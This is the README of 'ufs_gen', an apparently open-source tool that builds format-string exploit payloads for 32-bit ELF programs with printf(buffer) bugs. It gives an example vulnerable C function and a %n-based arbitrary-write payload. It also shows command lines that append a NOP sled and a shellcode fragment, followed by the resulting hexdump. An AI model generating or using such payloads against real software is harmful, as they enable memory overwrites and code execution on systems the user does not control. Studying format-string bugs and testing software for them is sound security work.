ufs_gen ======= This software allows you to generate a payload which may override an address with the value of your choice. The syntax is quite simple: There are three parameters needed for the program to run correctly. stackidx: this parameter specifies how many dwords you need to access the beginning of your buffer (or payload). override: the address to override with: the value to inject at the address overriden This software is intended to work with an ELF32 generated by a typical code. example: int function(const char *payload) { char buffer[BUFSIZ]; strncpy(buffer, payload, sizeof(buffer)); buffer[sizeof(buffer) - 1] = '\0'; printf(buffer); return 0; } The support of ELF64 and other formats is intended but not written yet. Although the option 'addrsize' might already be used to specify if an address is not 4 bytes long, there is very few chances that it would work correctly. The support of printf(payload) directly (i.e. without a temporary buffer) is also planned. We support the option --prefix and --suffix which respectively prepend and append their argument to the payload. We also support the option --sfxnops which adds n NOP byte (0x90) between the payload and the suffix Example ======= user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')" user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode" --sfxnops 100 | hexdump -C NOP bytes are at offset 52 (0x34) suffix is at offset 152 (0x98) 00000000 44 33 22 11 45 33 22 11 46 33 22 11 47 33 22 11 |D3".E3".F3".G3".| 00000010 25 31 32 30 78 25 34 24 6e 25 32 33 39 78 25 35 |%120x%4$n%239x%5| 00000020 24 6e 25 32 33 39 78 25 36 24 6e 25 32 33 39 78 |$n%239x%6$n%239x| 00000030 25 37 24 6e 90 90 90 90 90 90 90 90 90 90 90 90 |%7$n............| 00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000090 90 90 90 90 90 90 90 90 68 2f 73 68 ff fe 44 |........h/sh..D| 0000009f License ======= This software is free software covered by the GPL license v2. You should read the COPYING file to understand what is implied.